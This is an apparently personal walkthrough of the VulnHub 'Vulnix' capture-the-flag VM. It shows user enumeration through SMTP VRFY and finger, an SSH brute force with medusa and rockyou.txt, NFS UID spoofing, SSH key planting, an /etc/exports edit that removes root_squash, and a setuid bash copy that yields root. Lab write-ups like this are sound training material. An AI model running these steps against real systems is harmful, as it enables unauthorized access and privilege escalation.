VM 5: Vulnix :

Walkthru:

A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs]

B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd]

C. https://www.rebootuser.com/?p=988[ local bash shell from nfs]

B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions]

D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ]

Notes:

-As you can see the root user is the only account which is logged on the remote host.Nowthat we have a specific username we can use it in order to obtain more information about this user with the command finger root@host.

- Another effective use of the finger command is when you use it with the following syntax: finger user@host
we have following users;
root , user, dovenull

-VRFY username to double check the usernames

1. Scan shows many ports
2. telnet to port 25 smtp

# telnet 192.168.56.103 25
Trying 192.168.56.103...
Connected to 192.168.56.103.
Escape character is '^]'.
220 vulnix ESMTP Postfix (Ubuntu)
ehlo server
250-vulnix
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy root [will respond as below if user exist]
252 2.0.0 root
vrfy admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
vrfy user
252 2.0.0 user
vrfy administrator
550 5.1.1 <administrator>: Recipient address rejected: User unknown in local recipient table
vrfy vulnix
252 2.0.0 vulnix

3. I find 3 users on the system: root, user and vulnix. I go ahead with some research using finger:

# finger @192.168.56.103
No one logged on.
root@karen:/mnt# finger root@192.168.56.103
finger root@192.168.56.103
Login: root                 Name: root
Directory: /root                      Shell: /bin/bash
Never logged in.
No mail.
No Plan.

# finger user@192.168.56.103
Login: user                 Name: user
Directory: /home/user                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull             Name: Dovecot login user
Directory: /nonexistent               Shell: /bin/false
Never logged in.
No mail.
No Plan.

# finger vulnix@192.168.56.103
Login: vulnix               Name: 
Directory: /home/vulnix               Shell: /bin/bash
Never logged in.
No mail.
No Plan.

4. Interestingly, the user user also has a virtual user for Dovecot, but with no login. Dovecot is an open source email server. This could be useful information to bear in mind.

5. The service rpcbind is open. This is useful to do some RPC enumeration:

# rpcinfo -p 192.168.56.103
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  55327  status
    100024    1   tcp  46272  status
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100021    1   udp  53621  nlockmgr
    100021    3   udp  53621  nlockmgr
    100021    4   udp  53621  nlockmgr
    100021    1   tcp  49130  nlockmgr
    100021    3   tcp  49130  nlockmgr
    100021    4   tcp  49130  nlockmgr
    100005    1   udp  60970  mountd
    100005    1   tcp  35565  mountd
    100005    2   udp  58037  mountd
    100005    2   tcp  34661  mountd
    100005    3   udp  37005  mountd
    100005    3   tcp  33461  mountd

6. Now I know for sure that the NFS is listening on port 2049/tcp and 2049/udp. At this point it’s time to do some NFS enumeration:

# showmount -e 192.168.56.103
Export list for 192.168.56.103:
/home/vulnix *

7. This means that a share is accessible from any host. So I mount the location of this share on my local machine:

# mount 192.168.56.103:/home/vulnix /mnt/vulnix/

but when I try to access the folder, I retrieve an access denied. I try to change permissions to access, but I retrieve the same error. I think root squashing

What is root squash? 

Root squash basically remaps the root UID from 0 to an anonymous user with no privileges (usually mouser:no group). This means that root is stripped of all privileges and is not able to read any files which are not world read, or write to any paths that are restricted. 

[source@http://fullyautolinux.blogspot.com/2015/11/nfs-norootsquash-and-suid-basic-nfs.html]

8. At this point, I decide to bruteforce the passwords of the users that I’ve retrieved. I create a file collecting all the users (without the user dovenull, who doesn’t have a login access):

# cat users.txt

root
user
vulnix

and I use the wordlist rockyou.txt to crack the password:

# medusa -h 192.168.56.103 -U users.txt -P /usr/share/wordlists/rockyou.txt -e ns -f -M ssh > medusa_output.txt

9. I finally crack the password of the user user, which is letmein.

10. Of course, this user is not a sudoer. Last resort is trying to log in as user vulnix.

11. I check the /etc/passwd file on the victim server, and I find out that the user vulnix has UID 2008, so I create a user called vulnix on my local machine with UID as 2008 and try to access again the partition:

11a. kali# useradd -u 2008 vulnix

11b. # su - vulnix

11c. cd /mnt/vulnix/

11d. ls -la

total 20
drwxr-x--- 2 4294967294 4294967294 4096 Sep  2  2012 .
drwxr-xr-x 3 root       root       4096 Feb  6 17:48 ..
-rw-r--r-- 1 4294967294 4294967294  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 4294967294 4294967294 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 4294967294 4294967294  675 Apr  3  2012 .profile

12. I’m in, so I generate an SSH key to log in on the server as user vulnix without password:

this is on my local machine as myself, generating a new ssh-key:
# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):      
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
c0:62:1d:58:df:9e:ab:2d:cb:97:ac:65:5c:bf:3e:cf root@karen
The key's randomart image is:
+---[RSA 2048]----+
|     oo          |
|    .o o .       |
|    o + . .      |
|   . . . . .     |
|        S o .    |
|         . o .   |
|         .=.  .  |
|       ..=+   .o |
|        ==.  .ooE|
+-----------------+

# cat /root/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RaeMdpTMXa+biV7pwsvAhzlf4XhMjO9Ia6JM0zAgHN8JsW1FXVtxX90xBJ2CKrYu5aj7PYAlZDxoAMYYLF402pkwKU89j9U38malcuTWRNbj6NNI3BeWRDcxdHsKu8b42xIFGKmBIitZRRCl4uKXDV/WIejdK9vWRTNaYZ9W33vwXEhjyYH/HvBhNpmYYMiqzahhRNqd1Ir6qtaVdQPE63Bu3EY9mfTg5XtnPQzoHlnCkDLFwBVrSPXHnnjnAoSNoAc25ff0A6gveqnRAz8lWqOPJ5cruHzXE3ZOQXfTcH71h0a1uBEoMw9GPkuJM7ba6OwZALVEfO15LkliBZ0t root@karen

and on another terminal as `vulnix` user, copying the generated ssh-key into the `/home/vulnix/.ssh/authorized_keys` file:
vulnix@karen:/mnt/vulnix$ mkdir .ssh
vulnix@karen:/mnt/vulnix$ cd .ssh  
vulnix@karen:/mnt/vulnix/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RaeMdpTMXa+biV7pwsvAhzlf4XhMjO9Ia6JM0zAgHN8JsW1FXVtxX90xBJ2CKrYu5aj7PYAlZDxoAMYYLF402pkwKU89j9U38malcuTWRNbj6NNI3BeWRDcxdHsKu8b42xIFGKmBIitZRRCl4uKXDV/WIejdK9vWRTNaYZ9W33vwXEhjyYH/HvBhNpmYYMiqzahhRNqd1Ir6qtaVdQPE63Bu3EY9mfTg5XtnPQzoHlnCkDLFwBVrSPXHnnjnAoSNoAc25ff0A6gveqnRAz8lWqOPJ5cruHzXE3ZOQXfTcH71h0a1uBEoMw9GPkuJM7ba6OwZALVEfO15LkliBZ0t root@karen" > authorized_keys
vulnix@karen:/mnt/vulnix/.ssh$ 
vulnix@karen:/mnt/vulnix/.ssh$ ls -l
total 4
-rw-r--r-- 1 4294967294 4294967294 392 Feb  6 19:17 authorized_keys


and then I login on the victim's machine as `vulnix`:
# ssh vulnix@192.168.56.103  [had problems while connecting as I was getting pwd prompt instead of pass thru. used -vvv with the ssh command from the kali server to debug, cleaned the known_host and id_rsa files from root folders which I thought was the problem, generated the keys again, copiedd tried it and it went thru w/o prompting password]

Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Feb  6 19:21:13 GMT 2016

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 8%               IP address for eth0: 192.168.56.103
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

13. vulnix@vulnix:~$ whoami

vulnix
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix) 

I don't know vulnix's password, but I find out that is a sudoer:

$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

This is good, since vulnix can run a command to open /etc/exports even without typing a password. This is what I find:

$ sudoedit /etc/exports

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)
/root    *(rw,no_root_squash)

Remember what I said about Root squashing before? (thanks for the lession, Owen xD)

I replace the root_squash flag with no_root_squash. I need to cheat a bit since I don’t have vulnix’s password and there’s no way to export again the NFS partition without a sudo user executing the command /usr/sbin/exportfs -a or a machine reboot, so I reboot it manually [ here I was getting some errors when I try to mount the same folder as root so added /root to the export list so I can map that instead]

14. Once the machine has rebooted, I mount the partition again and access as local root user. At this time I  can cat trophy.txt file

15. Additional steps but didn't have to use it. Once mounted, I get a copy of the victim’s machine local shell and I change the ownership and SID to the root one:

On the victim's machine, as `vulnix`:
$ cp /bin/bash local_shell

On my local machine, as `root`:
# ls -l
total 900
-rwxr-xr-x 1 4294967294 4294967294 920788 Feb  6 20:53 local_shell
root@karen:/mnt/vulnix# cat local_shell > spawn_root_shell
root@karen:/mnt/vulnix# chmod 4777 !$
chmod 4777 spawn_root_shell

On the victim's machine I then execute the shell keeping the original file's permissions with the flag `-p`:

$ ls -l
total 1800
-rwxr-xr-x 1 vulnix vulnix 920788 Feb  6 20:53 local_shell
-rwsrwxrwx 1 root   root   920788 Feb  6 20:54 spawn_root_shell
$ ./spawn_root_shell -p
spawn_root_shell-4.2# whoami
root
spawn_root_shell-4.2#
# cd /root/
spawn_root_shell-4.2# ls -l
total 4
-r-------- 1 root root 33 Sep  2  2012 trophy.txt
spawn_root_shell-4.2# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be